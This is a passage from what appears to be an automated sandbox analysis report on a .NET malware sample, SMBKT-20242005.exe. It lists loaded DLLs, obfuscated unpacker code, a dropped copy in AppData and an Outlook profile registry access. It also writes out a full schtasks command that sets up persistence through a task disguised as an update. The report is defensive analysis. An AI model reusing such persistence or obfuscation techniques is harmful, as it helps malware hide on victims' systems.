                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: SMBKT-20242005.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SMBKT-20242005.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: SMBKT-20242005.exe, FrmArticulos.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: SMBKT-20242005.exe, FrmArticulos.cs.Net Code: InitializeComponent
                    Source: 1.2.SMBKT-20242005.exe.3d79970.3.raw.unpack, LoginForm.cs.Net Code: _200E_202E_200D_206C_202E_206B_200C_200E_206F_206F_202A_206E_202D_206B_206F_202A_202A_206C_206C_200C_206B_206E_202A_206D_200D_202B_200F_206A_202E_200B_202A_202E_202B_202C_200C_202A_206C_202A_206B_200E_202E System.Reflection.Assembly.Load(byte[])
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, MOpw42XW44bQchxYdQ.cs.Net Code: qD0cfWrQG7lR456JhKH System.Reflection.Assembly.Load(byte[])
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, MOpw42XW44bQchxYdQ.cs.Net Code: qD0cfWrQG7lR456JhKH System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_0137F568 pushfd ; iretd 1_2_0137F569
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01490C6D push edi; retf 8_2_01490C7A
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_02A3F568 pushfd ; iretd 9_2_02A3F569
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CB0007 pushfd ; retf 9_2_04CB001E
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CB5E8F push edi; retf 9_2_04CB5E92
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CB5E83 push ebp; retf 9_2_04CB5E86
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CB5E87 push ebp; retf 9_2_04CB5E8A
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CB5E7F push esp; retf 9_2_04CB5E82
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CB5E73 push ebx; retf 9_2_04CB5E76
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CB9BE6 pushfd ; retf 9_2_04CB9BE7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_03000C6D push edi; retf 15_2_03000C7A
                    Source: SMBKT-20242005.exeStatic PE information: section name: .text entropy: 7.957426352792891
                    Source: joUXSCpr.exe.1.drStatic PE information: section name: .text entropy: 7.957426352792891
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, xvFhJGQTqsI1UuxytV.csHigh entropy of concatenated method names: 'VkNrlPDK5i', 'jLrrEgJGvc', 'corrUHH8J8', 'd2rrquwVO1', 'Pn7rnkJZHM', 'p8ur5Iftj7', 'ygQrmKHjkG', 'e4cMt59hBJ', 'urEMoqKJOL', 'si2My3BkFw'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, RB2hbuowLAD77RFAjt.csHigh entropy of concatenated method names: 'mf8MqMUB1J', 'QkcMn90FVG', 'xOOMAuY7MR', 'Ir5M5xNZjb', 'FSLMmH35Us', 'H8sMKJX07Q', 's4XMX6RJ2A', 'jYlMe5jAGU', 'TOFMReMxh9', 'W3fMcvhUk6'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, NBpKsHTbyWOajjPZR8.csHigh entropy of concatenated method names: 'PiiK3mEMGX', 'Mi5KjrqiFA', 'sGbKSQyovl', 'EiDKg1m6Ml', 'KFJKLYvAxX', 'mPBKx2wT1r', 'QVBKZSR4jF', 'xouKCvuBrb', 'lZtKPcCc25', 'CC9K7a5mBJ'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, ce1ejpw8LdIwajTb0f.csHigh entropy of concatenated method names: 'dcoNRlivRB', 'o7uNc9eLkG', 'ToString', 'C7FNqk4FLK', 'WjHNnuifyq', 'nf1NAY9Tla', 'wohN58uwda', 'MH3NmuBRaI', 'uGXNKWS4Tk', 'slENXtKK2o'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, IbTTDEyVr6AL8S6lDj.csHigh entropy of concatenated method names: 'x4fMVWiUNJ', 'RL7MBnFF8e', 'Yu1MIlBVEe', 'HW9MF7yp6q', 'iJJMJxXu0e', 's3EMOrPVpI', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, zMYnEu9ZCOSuCGEhBb.csHigh entropy of concatenated method names: 'K7aSrk4my', 'AWQgdtPfL', 'dtaxU9b89', 'OYsZjWVsR', 'W5SPdCaDV', 'H0B7JlmlQ', 'zrvY1MUoaG5sdPSG2h', 'utq5JB7wsti1tLt06D', 'LHMMsshof', 'q8LG1eoDS'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, NJs0YFlEKbWeXGiHvfs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BLtGJJ0OeX', 'hXxGkVCEU8', 'DmWGfp9eZ7', 'qnRGwR2OPd', 'EXLGHcxSl6', 'goPG8e8pPV', 'AxDGtnboLG'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, di2lf8dRSFuX6wdQ7h.csHigh entropy of concatenated method names: 'sIrsCy7tAE', 'uhgsPLtIuv', 'ClgsVCZ97H', 'fVnsBPGcll', 'X5vsFZ0rJo', 'mbTsO2stoS', 'jl0sW5ep78', 'hJus2odWt5', 'B5YsaHVQjN', 'WN1sYZBtZb'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, OxhSPylpYJmsvdgICHu.csHigh entropy of concatenated method names: 'JV1r3NiHgO', 'rLfrjIHUDH', 'jD6rSGTs0B', 'fOErg3cG1d', 'yMOrLEYMBY', 'LkKrxqviJD', 'LqdrZ0Vp4o', 'GynrCQ6c2s', 'DlrrPKegMM', 'CRQr7rIo5y'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, MOpw42XW44bQchxYdQ.csHigh entropy of concatenated method names: 'ohZE0kHFqm', 'eVvEqJOhNO', 'IcnEn1EjOe', 'pnAEAhnxpm', 'bRdE5daMAw', 'PXsEmPCQOZ', 'bLIEK20mV5', 'ON4EXTPAWQ', 'WXhEe4hYE7', 'K7VERjKIoE'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, BO0nenn1KpnpOn007K.csHigh entropy of concatenated method names: 'Dispose', 'zbBly9tI9M', 'Jq99BpeD4U', 'suoKKh3DfW', 'nkBlQ2hbuw', 'BADlz77RFA', 'ProcessDialogKey', 'ytI9pbTTDE', 'Gr69lAL8S6', 'bDj993vFhJ'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, JAGbyhU8trpxhEj6kj.csHigh entropy of concatenated method names: 'XrklKVSMvv', 'MGPlXKFxIW', 'mr8lRERwiG', 'zsrlc12d1Z', 'Cwtlbn30MN', 'kW1l67tx8g', 'TwapTPZFOtcSeT5h7V', 'RT7EmheVIcGalSnnx8', 'pLnllU3NK6', 'dAQlEDS29x'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, McTFqUJVJBW9WkAeJ8.csHigh entropy of concatenated method names: 'nRZbai7utf', 'fZlbhKR8NK', 'LEfbJDYxHK', 'FnGbk62I3n', 'u5tbBVjkev', 'rjKbIghQ9c', 'jnXbFqnSxP', 'gZ3bOrGxPQ', 'M7eb4f5ALs', 'cxmbW1UrSC'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, RVSMvvC2GPKFxIWs0H.csHigh entropy of concatenated method names: 'OutnJusoe2', 'CkDnkApeRV', 'kROnfV6bC0', 'g7dnwNluSh', 'hQRnH8dqYq', 'n3en8Amxsu', 'qgNntathyO', 'Ftmno54rSC', 'pilnyA4ohL', 'NXmnQkZyOP'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, eMNXW1V7tx8gMVO5Nm.csHigh entropy of concatenated method names: 'KJOm0YSZ94', 'jpZmnovuyi', 'uEbm5jRCbk', 'isJmK3hS8J', 'iODmXgtOkR', 'Fwc5HO4La9', 'CZG58grc5n', 'eTg5tvE7nn', 'oav5ooVngJ', 'FZj5yKOB1D'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, j8T3WcPr8ERwiGSsr1.csHigh entropy of concatenated method names: 'R4qAg6unTC', 'OfMAxGJNuB', 'wITAC75S36', 'hVkAPjv7mI', 'TMTAbuYYPM', 'O5MA6bgph4', 'WGfANVmibh', 'RkfAMAZL0g', 'hSKArKKmKo', 'XlFAGW5vKV'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, GdfDcr8tpxZ8CIFGQi.csHigh entropy of concatenated method names: 'dAuNo8cajN', 'gX6NQmbrx9', 'Nr0Mpj0Rqb', 'x2JMl00UEB', 'yysNYF1L8h', 'BneNh2LD2w', 'MC0Nd2MeS7', 'iQkNJ9GHkw', 'aIjNkoLyl3', 'FIrNf0MYEQ'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, hZF5sRzoC3nsU4Lu7S.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uB7rsC5v4G', 't7crbuvK84', 'Ds5r69Mgp9', 'tBjrNFTDQe', 'XPRrMWWLQf', 'qW4rrUDjPV', 'XRrrGfR5lX'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, ngOt4sfBWRhu2ZJStX.csHigh entropy of concatenated method names: 'ToString', 'Dvu6YTklsH', 'rAe6BmrqGQ', 'N946IPCfrh', 'CZo6F2yWna', 'Jjs6OiooHn', 'Sl86450h33', 'QDa6W9TUKn', 'TLE62al4jN', 'ooN6TNZlu8'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, DZq3j4WtyiAntFwYx5.csHigh entropy of concatenated method names: 'mTZKqBG8W7', 'd4ZKAWlwe8', 'lMlKm7jhde', 'CxAmQyj78x', 'cp1mzZLAqh', 'gR5KpV1N30', 'DvpKlKuFvW', 'FXHK9NQiat', 'oWsKEKmCZI', 'v1lKUxQmjD'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, xvFhJGQTqsI1UuxytV.csHigh entropy of concatenated method names: 'VkNrlPDK5i', 'jLrrEgJGvc', 'corrUHH8J8', 'd2rrquwVO1', 'Pn7rnkJZHM', 'p8ur5Iftj7', 'ygQrmKHjkG', 'e4cMt59hBJ', 'urEMoqKJOL', 'si2My3BkFw'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, RB2hbuowLAD77RFAjt.csHigh entropy of concatenated method names: 'mf8MqMUB1J', 'QkcMn90FVG', 'xOOMAuY7MR', 'Ir5M5xNZjb', 'FSLMmH35Us', 'H8sMKJX07Q', 's4XMX6RJ2A', 'jYlMe5jAGU', 'TOFMReMxh9', 'W3fMcvhUk6'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, NBpKsHTbyWOajjPZR8.csHigh entropy of concatenated method names: 'PiiK3mEMGX', 'Mi5KjrqiFA', 'sGbKSQyovl', 'EiDKg1m6Ml', 'KFJKLYvAxX', 'mPBKx2wT1r', 'QVBKZSR4jF', 'xouKCvuBrb', 'lZtKPcCc25', 'CC9K7a5mBJ'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, ce1ejpw8LdIwajTb0f.csHigh entropy of concatenated method names: 'dcoNRlivRB', 'o7uNc9eLkG', 'ToString', 'C7FNqk4FLK', 'WjHNnuifyq', 'nf1NAY9Tla', 'wohN58uwda', 'MH3NmuBRaI', 'uGXNKWS4Tk', 'slENXtKK2o'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, IbTTDEyVr6AL8S6lDj.csHigh entropy of concatenated method names: 'x4fMVWiUNJ', 'RL7MBnFF8e', 'Yu1MIlBVEe', 'HW9MF7yp6q', 'iJJMJxXu0e', 's3EMOrPVpI', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, zMYnEu9ZCOSuCGEhBb.csHigh entropy of concatenated method names: 'K7aSrk4my', 'AWQgdtPfL', 'dtaxU9b89', 'OYsZjWVsR', 'W5SPdCaDV', 'H0B7JlmlQ', 'zrvY1MUoaG5sdPSG2h', 'utq5JB7wsti1tLt06D', 'LHMMsshof', 'q8LG1eoDS'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, NJs0YFlEKbWeXGiHvfs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BLtGJJ0OeX', 'hXxGkVCEU8', 'DmWGfp9eZ7', 'qnRGwR2OPd', 'EXLGHcxSl6', 'goPG8e8pPV', 'AxDGtnboLG'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, di2lf8dRSFuX6wdQ7h.csHigh entropy of concatenated method names: 'sIrsCy7tAE', 'uhgsPLtIuv', 'ClgsVCZ97H', 'fVnsBPGcll', 'X5vsFZ0rJo', 'mbTsO2stoS', 'jl0sW5ep78', 'hJus2odWt5', 'B5YsaHVQjN', 'WN1sYZBtZb'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, OxhSPylpYJmsvdgICHu.csHigh entropy of concatenated method names: 'JV1r3NiHgO', 'rLfrjIHUDH', 'jD6rSGTs0B', 'fOErg3cG1d', 'yMOrLEYMBY', 'LkKrxqviJD', 'LqdrZ0Vp4o', 'GynrCQ6c2s', 'DlrrPKegMM', 'CRQr7rIo5y'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, MOpw42XW44bQchxYdQ.csHigh entropy of concatenated method names: 'ohZE0kHFqm', 'eVvEqJOhNO', 'IcnEn1EjOe', 'pnAEAhnxpm', 'bRdE5daMAw', 'PXsEmPCQOZ', 'bLIEK20mV5', 'ON4EXTPAWQ', 'WXhEe4hYE7', 'K7VERjKIoE'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, BO0nenn1KpnpOn007K.csHigh entropy of concatenated method names: 'Dispose', 'zbBly9tI9M', 'Jq99BpeD4U', 'suoKKh3DfW', 'nkBlQ2hbuw', 'BADlz77RFA', 'ProcessDialogKey', 'ytI9pbTTDE', 'Gr69lAL8S6', 'bDj993vFhJ'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, JAGbyhU8trpxhEj6kj.csHigh entropy of concatenated method names: 'XrklKVSMvv', 'MGPlXKFxIW', 'mr8lRERwiG', 'zsrlc12d1Z', 'Cwtlbn30MN', 'kW1l67tx8g', 'TwapTPZFOtcSeT5h7V', 'RT7EmheVIcGalSnnx8', 'pLnllU3NK6', 'dAQlEDS29x'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, McTFqUJVJBW9WkAeJ8.csHigh entropy of concatenated method names: 'nRZbai7utf', 'fZlbhKR8NK', 'LEfbJDYxHK', 'FnGbk62I3n', 'u5tbBVjkev', 'rjKbIghQ9c', 'jnXbFqnSxP', 'gZ3bOrGxPQ', 'M7eb4f5ALs', 'cxmbW1UrSC'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, RVSMvvC2GPKFxIWs0H.csHigh entropy of concatenated method names: 'OutnJusoe2', 'CkDnkApeRV', 'kROnfV6bC0', 'g7dnwNluSh', 'hQRnH8dqYq', 'n3en8Amxsu', 'qgNntathyO', 'Ftmno54rSC', 'pilnyA4ohL', 'NXmnQkZyOP'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, eMNXW1V7tx8gMVO5Nm.csHigh entropy of concatenated method names: 'KJOm0YSZ94', 'jpZmnovuyi', 'uEbm5jRCbk', 'isJmK3hS8J', 'iODmXgtOkR', 'Fwc5HO4La9', 'CZG58grc5n', 'eTg5tvE7nn', 'oav5ooVngJ', 'FZj5yKOB1D'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, j8T3WcPr8ERwiGSsr1.csHigh entropy of concatenated method names: 'R4qAg6unTC', 'OfMAxGJNuB', 'wITAC75S36', 'hVkAPjv7mI', 'TMTAbuYYPM', 'O5MA6bgph4', 'WGfANVmibh', 'RkfAMAZL0g', 'hSKArKKmKo', 'XlFAGW5vKV'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, GdfDcr8tpxZ8CIFGQi.csHigh entropy of concatenated method names: 'dAuNo8cajN', 'gX6NQmbrx9', 'Nr0Mpj0Rqb', 'x2JMl00UEB', 'yysNYF1L8h', 'BneNh2LD2w', 'MC0Nd2MeS7', 'iQkNJ9GHkw', 'aIjNkoLyl3', 'FIrNf0MYEQ'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, hZF5sRzoC3nsU4Lu7S.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uB7rsC5v4G', 't7crbuvK84', 'Ds5r69Mgp9', 'tBjrNFTDQe', 'XPRrMWWLQf', 'qW4rrUDjPV', 'XRrrGfR5lX'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, ngOt4sfBWRhu2ZJStX.csHigh entropy of concatenated method names: 'ToString', 'Dvu6YTklsH', 'rAe6BmrqGQ', 'N946IPCfrh', 'CZo6F2yWna', 'Jjs6OiooHn', 'Sl86450h33', 'QDa6W9TUKn', 'TLE62al4jN', 'ooN6TNZlu8'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, DZq3j4WtyiAntFwYx5.csHigh entropy of concatenated method names: 'mTZKqBG8W7', 'd4ZKAWlwe8', 'lMlKm7jhde', 'CxAmQyj78x', 'cp1mzZLAqh', 'gR5KpV1N30', 'DvpKlKuFvW', 'FXHK9NQiat', 'oWsKEKmCZI', 'v1lKUxQmjD'
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeFile created: C:\Users\user\AppData\Roaming\joUXSCpr.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
